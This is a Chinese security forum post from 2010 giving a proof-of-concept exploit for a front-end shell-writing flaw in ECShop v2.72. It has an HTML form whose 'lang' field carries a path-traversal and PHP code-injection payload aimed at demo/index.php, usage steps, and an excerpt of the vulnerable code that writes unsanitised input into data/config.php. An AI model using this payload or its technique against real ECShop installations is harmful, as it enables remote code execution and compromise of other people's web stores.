|
  
- 帖子
- 3852
- 积分
- 13044
- 威望
- 16780
- 金钱
- 36761
- 在线时间
- 1139 小时
         
|
by:xhm1n9
02
03 <title>ecshop v2.72 前台写shell漏洞 by:xhm1n9</title>
04 <form method="post" name="register" action="http://127.1/ecshop2.72/demo/index.php">
05 <h3>ecshop v2.72 前台写shell漏洞</h3>利用方试:提交两次,第二次内容任意</br>
06 <input type="text" name="lang" size="80" value="');phpinfo();(_1_/../../../index" />
07 <input type="hidden" name="step" value="readme" />
08 <button class="submit" type="submit" name="regsubmit" value="true">提交</button>
09 </form>
10
11 <!-------------
12 demo/index.php
13
14
15 if (!empty($_POST['lang']))
16 {
17 $lang_charset = explode('_', $_POST['lang']);
18 $updater_lang = $lang_charset[0].'_'.$lang_charset[1];
19 $ec_charset = $lang_charset[2];
20 }
21 ........................................
22 $updater_lang_package_path = ROOT_PATH . 'demo/languages/' . $updater_lang . '_' . $ec_charset .'.php';
23
24 if (file_exists($updater_lang_package_path))
25 {
26 include_once($updater_lang_package_path);
27 $smarty->assign('lang', $_LANG);
28 }
29 else
30 {
31 die('Can\'t find language package!');
32 }
33
34 /* 初始化流程控制变量 */
35
36 $step = isset($_REQUEST['step']) ? $_REQUEST['step'] : 'sel_lang';
37
38 $smarty->assign('ec_charset', $ec_charset);
39 $smarty->assign('updater_lang', $updater_lang);
40 switch($step)
41 {
42 case 'readme' :
43 write_charset_config($updater_lang, $ec_charset);
44 .......................................
45
46 function write_charset_config($lang, $charset)
47 {
48 $config_file = ROOT_PATH . 'data/config.php';
49 $s = file_get_contents($config_file);
50 $s = insertconfig($s, "/\?\>/","");
51 $s = insertconfig($s, "/define\('EC_LANGUAGE',\s*'.*?'\);/i", "define('EC_LANGUAGE', '" . $lang . "');");
52 $s = insertconfig($s, "/define\('EC_CHARSET',\s*'.*?'\);/i", "define('EC_CHARSET', '" . $charset . "');");
53 $s = insertconfig($s, "/\?\>/","?>");
54 return file_put_contents($config_file, $s);
55 }
56
57 -----------------> |
|
发表于 2010-11-28 04:22
| 
发表于 2010-11-28 08:54
| 